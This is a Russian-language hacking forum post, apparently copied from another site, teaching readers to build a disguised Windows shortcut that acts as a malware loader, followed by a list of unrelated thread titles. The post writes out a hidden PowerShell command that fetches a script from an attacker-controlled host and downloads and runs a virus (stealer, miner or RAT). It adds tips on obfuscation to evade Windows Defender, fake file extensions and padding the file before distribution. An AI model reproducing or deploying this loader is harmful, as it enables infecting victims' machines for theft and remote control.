Статья Интересно Как заразить компьютер с помощью обычного ярлыка.

Emilio_Gaviriya

Пользователь

Как заразить компьютер с помощью обычного ярлыка.


Всем салют, дорогие друзья! Сегодня я расскажу вам об одном интересном приеме, который, несмотря на свою простоту, используется хакерами в реальных атаках.

В этой статье вы узнаете, как хакеры собственноручно создают лоадер, который, в свою очередь, загружает их вирусы на компьютер цели.

  • Для начала напомню, что такое лоадер:

Лоадер - это небольшой файл, который в обход файрволлов загружает нужный хакеру файл (вирус - стиллер, майнер, RAT и т.д.) на машину цели и незаметно его запускает. Считается, что грузить файлы с помощью лоадера намного лучше, чем грузить файлы сразу. Так что вещь в хакерском хозяйстве незаменимая.

Как это работает?​

✅ Ну, а теперь, давайте разберемся, как это работает!
  • Первое, что понадобится - это совершенно любой бесплатный хостинг. Для примера я буду использовать 000webhost.com
1daf76_137aab75886b4c19bae5d6a95f8c3ece~mv2.png

  • Переходим на сайт -> выбираем бесплатный тариф -> проходим стандартную регистрацию:
1daf76_2414c61280a54b57ab3aa9c0c9288538~mv2.png

  • Переходим в панель управления и жмём вот так:
1daf76_0a7766c917a64ec1a7de4e747f449ba2~mv2.png

  • Создаем новый файл:
1daf76_39e047a7872347b3a51815e4f9a83acd~mv2.png

  • Выбираем наш файл и жмём Edit:
1daf76_c9d3ed0d7ce74fd4926433f8918c0e70~mv2.png

  • Вставляем в данный файл следующий текст и сохраняем:
Invoke-WebRequest ссылка_на_файл_вируса -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe

1daf76_93eb9ba389964fac8db2d595d35b6768~mv2.png

  • Теперь нам нужно получить ссылку на наш файл. Сделать это очень просто: жмем правой кнопкой мыши по нашему файлу и выбираем View:
1daf76_99badd0ee78e4ab0ad28c7da6827486f~mv2.png

  • После этого в вашем браузере откроется новое окошко. Перейдите в него и просто скопируйте ссылку из адресной строки браузера:
1daf76_5f3165cdc564497c8fe67f44ee132dc4~mv2.png

  • Далее идем на сайт сократителя ссылок cuti.cc и вставляем в поле ссылку на .txt файл, который мы создавали выше:
1daf76_14f0ef07dd574412b6a9aee0f1af5ae0~mv2.png

  • Отлично, у нас есть сокращенная ссылка. Не теряйте ее.
  • Теперь создадим сам ярлык:
1daf76_86c7875e35a4456aa3e1b36a27749e38~mv2.png

  • В путь пишем вот это:
C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content

1daf76_402ce0214ea9441fa15f76e71a4a2e27~mv2.png

  • Ярлык-лоадер готов!

Несколько важных моментов​

  • Наверняка вам интересно, на кой черт используется сокращатель ссылок?
Ответ прост: прописываемый в ярлыке путь имеет ограничение на длину символов. Исходная ссылка туда не влазит.

  • Как хакеры делают так, чтобы Windows Defender не палил лоадер?
Многие используют скрипт обфускации повершелл: https://github.com/danielbohannon/Invoke-Obfuscation, с целью обфусцификации команды которая прописывается в путь. Выглядит она после этого не как выше, а вот так:

-command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content

  • Что делают хакеры, после того, как создали такой ярлык?
На файл ярлыка устанавливается иконка и нужное название файла. Так как у ярлыка не видно расширения, добавляют и его, например, дописав в конце имени файла .txt или любое другое. Если есть нужда увеличить размер файла, то можно накачивают его любым пампером. После этого файл готов к распространению.

Мануал честно спизжен с HackerPlace.
 
Похожие темы
W [ВОПРОС] Как заразить сайт имея доступ к FTP Свободное общение 3
Admin Вредоносные .REG файлы или как заразить систему имея доступ только к реестру Уязвимости и взлом 0
Admin СИ, НЛП, Впаривание малвари, как заразить вирусом Полезные статьи 0
Admin Интересно Тест-драйв: как избавиться от сомнений в выборе ИБ-решения за 7 дней. Новости в сети 0
Admin Интересно Как управлять скрытыми ИИ-инструментами без замедления работы сотрудников. Новости в сети 0
Admin Интересно Ошибка из 2018 и подставные аккаунты. Рассказываем, как популярный пакет art-template начал атаковать айфоны. Новости в сети 0
Admin Интересно Сотрудник ушёл, а доступ остался. Как забытая учётка открыла хакерам путь к водоснабжению целого города. Новости в сети 0
Admin Интересно Роботы научились двигаться как живая материя. Новости в сети 0
Admin Интересно Идентификация как основной вектор атак в современных системах безопасности. Новости в сети 0
Admin Интересно Студенты возмущены после того, как ИИ пропустил сотни имён на выпускной церемонии. Новости в сети 0
Admin Интересно Как небольшая группа пользователей может ухудшить рекомендации в TikTok. Новости в сети 0
Admin Интересно Как небольшая группа пользователей может испортить рекомендации на TikTok. Новости в сети 0
Admin Интересно Как снизить риск фишинга до того, как он приведёт к сбоям в бизнесе. Новости в сети 0
Admin Интересно Как автоматизация ИБ закрывает угрозы без рутины. Новости в сети 0
Admin Интересно VPN, просевший трафик и минус 7 млрд руб. Как новые требования Минцифры ударили по маркетплейсам. Новости в сети 0
Admin Интересно Как анализ собственных инструментов помогает снизить риски кибератак. Новости в сети 0
Admin Интересно Практический вебинар: Как PT NGFW защищает от атак в реальном времени. Новости в сети 0
Admin Интересно ИИ уходит на дно: плавучие серверы в океане как новый этап развития технологий. Новости в сети 0
Admin Интересно Мы искали инопланетян не там? Жизнь прячется не в молекулах, а в том, как они организованы. Новости в сети 0
Admin Интересно Как спрятать секрет с помощью недоказуемой математики? Учёный обошёл 30-летний запрет в криптографии. Новости в сети 0
Admin Интересно Anthropic рассказала, как отучила искусственный интеллект угрожать людям. Новости в сети 0
Admin Интересно Безопасность КИИ: что изменилось и как выстроить защиту. Новости в сети 0
Admin Интересно Звездные каннибалы и космические ДТП. Как во Вселенной появляются самые тяжелые черные дыры. Новости в сети 0
Admin Интересно Азбука Морзе, Grok и $200 000: как один пост в X заставил ИИ-агента перевести токены. Новости в сети 0
Admin Интересно ФБР также читает чаты. Как переписка в мессенджере стоила хакеру восьми лет свободы. Новости в сети 0
Admin Интересно Защита или цензура? История о том, как Касперский стал личным Роскомнадзором на MacBook. Новости в сети 0
Admin Интересно Первый удар по VPN в США: как Юта хочет запретить анонимность, не имея на это технических средств. Новости в сети 0
Admin Интересно Исследователь показал, как отследить австралийских полицейских через Bluetooth. Новости в сети 0
Admin Интересно Галактике 400 миллионов лет, но она выглядит на миллиарды. Уэбб нашёл невозможного красного монстра — и астрономы не понимают, как он успел повзрослет Новости в сети 0
Admin Интересно Целились в Starlink — попали в iPhone. Как новый запрет на спутниковое оборудование создал правовую неопределённость для всего рынка смартфонов. Новости в сети 0
Admin Интересно СМС, которую вы никогда не прочитаете. Как спецслужбы находят «важных персон» за пару часов. Новости в сети 0
Admin Интересно Скафандры не готовы, Луна ждёт. Как бюрократия срывает планы NASA вернуться на Луну. Новости в сети 0
Admin Интересно ИИ врёт так же, как раньше. Но теперь он делает это мило — и вы ему доверяете. Новости в сети 0
Admin Интересно Азартные игры, долги и переписка двух гениев. Как ссора из-за 100 долларов создала современную математику. Новости в сети 0
Admin Интересно Приключения казаха в южнокорейских сетях. Как жадность довела взломщика до тюрьмы. Новости в сети 0
Admin Интересно Что скрыто за вымогательством: как работает индустрия ransomware. Новости в сети 0
Admin Интересно Режиссёры защищают использование ИИ для воссоздания Вэла Килмера в новом фильме как «этичное». Новости в сети 0
Admin Интересно Частица, которая спасла бы физику. Стерильное нейтрино искали 30 лет — как жаль, что оно оказалось миражом. Новости в сети 0
Admin Интересно Вашему RDP поставили «лайк». История о том, как горстка серверов прочесала Интернет и нашла все изъяны. Новости в сети 0
Admin Интересно Русские хакеры против картошки фри. Как взлом кассы самообслуживания обернулся годом условно. Новости в сети 0
Admin Интересно Тройная порция шантажа под соусом анонимности. Как одна банда притворяется сразу тремя разными группировками. Новости в сети 0
Admin Интересно Как соседей России заставляют выбирать между Европой и личным спокойствием. Новости в сети 0
Admin Интересно Позвони мне через пылесос. Как выживает рунет после блокировки мессенджеров. Новости в сети 0
Admin Интересно Ускоритель частиц размером с карандаш. Мощность — как у километрового. И это работает. Новости в сети 0
Admin Интересно Война правок и логотипов: Как Euro-Office поссорился с ONLYOFFICE из-за лицензии. Новости в сети 0
Admin Интересно Цифры врали. Не специально — просто их сложили неправильно. Вот как парадокс Симпсона ломает статистику. Новости в сети 0
Admin Интересно Цифровые активы после смерти: как управлять рисками для цифрового наследства. Новости в сети 0
Admin Интересно Тихий взлом и полная невидимость. Рассказываем, как новый вирус RoadK1ll захватывает корпоративные сети. Новости в сети 0
Admin Интересно Как заморозить воду быстрее? Сначала вскипятите её и плюньте на здравый смысл. Новости в сети 0
Admin Интересно Откройте доступ к коду из любой точки мира. Как работает новый проект rustunnel. Новости в сети 0

Название темы